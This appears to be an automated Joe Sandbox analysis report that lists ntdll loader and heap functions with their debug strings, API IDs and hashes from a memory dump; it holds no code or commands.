                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                      • Opcode ID: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                                                      • Instruction ID: ebe54a65b87e4b381568a7d8354f6c8a3860a487e46677da6f5bb182b6f66092
                                                                                                                                                      • Opcode Fuzzy Hash: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                                                      • Instruction Fuzzy Hash: 31413635954789DFC722DF28C494B99B3A9FF40320F048B6DE8168B3C1C738A984CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                      • Opcode ID: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                                                      • Instruction ID: f19bd5dd62c6fc0db5f8b261023cc16b33072bd5ccbde0271516257a4cb5ed45
                                                                                                                                                      • Opcode Fuzzy Hash: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                                                      • Instruction Fuzzy Hash: 6D3100355147CCDFD722CF28C858FA97BA9FF01768F044B99E8028B791C779A988CA11
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476
                                                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
                                                                                                                                                      • LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
                                                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-3779518884
                                                                                                                                                      • Opcode ID: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                                                      • Instruction ID: e00536071bbb5710b84bcc47732331ff08f497dee7669940f19939fee1637492
                                                                                                                                                      • Opcode Fuzzy Hash: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                                                      • Instruction Fuzzy Hash: 3D314E72E00297AFDB12DB1C889AA59B2A5FF83354F42832AD90D57EC4D7709D80C7D1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                      • Opcode ID: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                                                      • Instruction ID: 8ad0d6fb811714eca10da0fc7248ad4eace876b97c163c49f6ccbaad1d8db7a4
                                                                                                                                                      • Opcode Fuzzy Hash: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                                                      • Instruction Fuzzy Hash: 3CF1BE74A0064ADFDB05CF69C890BAAB7B6FF86740F14866DE4159B381D734E982CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E
                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
                                                                                                                                                      • LdrpCheckModule, xrefs: 1E919F24
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP:
                                                                                                                                                      • API String ID: 3446177414-2466845122
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E924530
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E924592
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E924460
                                                                                                                                                      • ExecuteOptions, xrefs: 1E9244AB
                                                                                                                                                      • Execute=1, xrefs: 1E92451E
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E924507
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E92454D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9177DD, 1E917802
                                                                                                                                                      • SsHd, xrefs: 1E8CA304
                                                                                                                                                      • Actx , xrefs: 1E917819, 1E917880
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E917807
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9177E2
                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9178F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173
                                                                                                                                                      • GsHd, xrefs: 1E8CD794
                                                                                                                                                      • Actx , xrefs: 1E919315
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1745908468
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8A651C
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A6614
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A665F
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9097A0, 1E9097C9
                                                                                                                                                      • LdrpInitShimEngine, xrefs: 1E909783, 1E909796, 1E9097BF
                                                                                                                                                      • apphelp.dll, xrefs: 1E8A6446
                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E90977C
                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E909790
                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9097B9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E909854, 1E909895
                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909885
                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909843
                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 1E90984A, 1E90988B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-3589223738
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8DD879
                                                                                                                                                        • Part of subcall function 1E8B4779: RtlDebugPrintTimes.NTDLL ref: 1E8B4817
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1975516107
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Entry Heap Size , xrefs: 1E95EDED
                                                                                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
                                                                                                                                                      • HEAP: , xrefs: 1E95ECDD
                                                                                                                                                      • ---------------------------------------, xrefs: 1E95EDF9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                      • API String ID: 3446177414-1102453626
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 3446177414-1194432280
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 1E91A7A5
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E91A7AF
                                                                                                                                                      • apphelp.dll, xrefs: 1E8D2382
                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1E91A79F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 3446177414-3610490719
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9280F3
                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 1E9280E2
                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 1E9280E9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 1E934519
                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1E934508
                                                                                                                                                      • LdrpCheckRedirection, xrefs: 1E93450F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Wow64 Emulation Layer
                                                                                                                                                      • API String ID: 3446177414-921169906
                                                                                                                                                      Uniqueness

